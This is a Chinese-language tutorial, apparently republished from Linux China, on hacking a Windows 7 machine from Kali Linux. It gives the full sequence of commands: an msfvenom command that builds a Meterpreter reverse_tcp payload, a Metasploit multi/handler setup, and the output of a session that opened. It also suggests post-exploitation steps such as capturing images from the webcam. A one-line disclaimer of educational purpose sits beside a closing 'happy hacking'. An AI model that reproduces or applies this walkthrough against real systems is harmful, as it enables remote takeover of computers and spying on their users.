662
如何使用 Kali Linux 黑掉 Windows
Kali Linux 派生自 Debian Linux,主要用於滲透測試,擁有超過 300 個的預安裝好的滲透測試工具。Metasploit 項目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一個用於開發和執行安全利用代碼security exploit的工具。讓我們來使用 Kali Linux 來攻破 Windows 吧。請注意,我寫這篇文章隻是出於教育目的哦——一切因此帶來的後果和本文作者、譯者無關。
源機器詳情
Kali Linux
root@kali:/# uname -aLinux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linuxroot@kali:/#
用做攻擊對象的目標機器:
Windows 7 Ultimate SP1
步驟 1:創建 Payload 程序
Payload 是一個類似於病毒或者木馬的程序,可以運行在遠程目標上 —— 為了黑掉那台機器。可以通過以下命令來創建 Payload(program.exe),以便能使用 Kali Linux 黑掉 Windows。
root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exeNo platform was selected, choosing Msf::Module::Platform::Windows from the payloadNo Arch selected, selecting Arch: x86 from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 333 bytesFinal size of exe file: 73802 bytesSaved as: /root/program.exeroot@kali:/# ls -la /root/program.exe-rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe
通過 ls 命令,我們可以確認 Payload 程序是否成功生成在指定的位置。
步驟 2:運行 mfsconsole 命令啟動 msf 命令窗口
root@kali:# msfconsole.,,. ..\$$$$$L..,,==aaccaacc%#s$b. d8, d8Pd8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888pd888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'd8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88bd88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8bd88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88.a#$$$$$$"` 88b d8P 88b`?8888P',s$$$$$$$"` 888888P' 88n _.,,,ass;:.a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$',a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'_______________________________________________________________ ,&$$$$$$'_____ll&&$$$$'.;;lll&&&&'...;;lllll&'......;;;llll;;;....` ......;;;;... . .Taking notes in notepad? Have Metasploit Pro track & reportyour progress and findings -- learn more on https://rapid7.com/metasploit=[ metasploit v4.12.22-dev ]+ -- --=[ 1577 exploits - 906 auxiliary - 272 post ]+ -- --=[ 455 payloads - 39 encoders - 8 nops ]+ -- --=[ Free Metasploit Pro trial: https://r-7.co/trymsp ]msf >
步驟 3:進行漏洞利用的細節
- 4444 端口:你可以按照自己的想法來選擇使用哪個端口
- LHOST IP:表示 Kali Linux 機器的 IP,這裏是 192.168.189.128。 使用如下命令來查看你的 Kali Linux 機器的 IP。
root@kali:/# ip r l192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100root@kali:/#
現在在 msf 命令窗口使用 use exploit/multi/handler 命令,如下:
msf > use exploit/multi/handlermsf exploit(handler) >
然後在接下來的命令窗口中使用命令 set payload windows/meterpreter/reverse_tcp:
msf exploit(handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcp
現在使用 LHOST 和 LPORT 來設置本地 IP 和本地端口,如下:
msf exploit(handler) > set lhost 192.168.189.128lhost => 192.168.189.128msf exploit(handler) > set lport 4444lport => 4444
最後使用 exploit 命令。
msf exploit(handler) > exploit[*] Started reverse TCP handler on 192.168.189.128:4444[*] Starting the payload handler...
現在你需要在 Windows 上運行 program.exe,一旦它在目標機器上執行,你就可以建立一個 meterpreter 會話。輸入 sysinfo 就可以得到這台被黑掉的 Windows 機器的詳情。
msf exploit(handler) > exploit[*] Started reverse TCP handler on 192.168.189.128:4444[*] Starting the payload handler...[*] Sending stage (957999 bytes) to 192.168.189.1[*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000meterpreter > sysinfoComputer : MANN-PCOS : Windows 7 (Build 7601, Service Pack 1).Architecture : x64 (Current Process is WOW64)System Language : en_INDomain : WORKGROUPLogged On Users : 2Meterpreter : x86/win32
一旦你得到了這些詳細信息,就可以做更多的漏洞利用,或者通過 help 命令獲取更多信息,以便列出你可以黑掉該係統的所有選項,比如 webcam_snap 命令獲取網絡攝像頭,同樣你還可以使用其他更多的可用選項。祝你入侵愉快!!!! ←_←
原文發布時間為:2017-02-11
本文來自雲棲社區合作夥伴“Linux中國”
最後更新:2017-05-26 09:02:08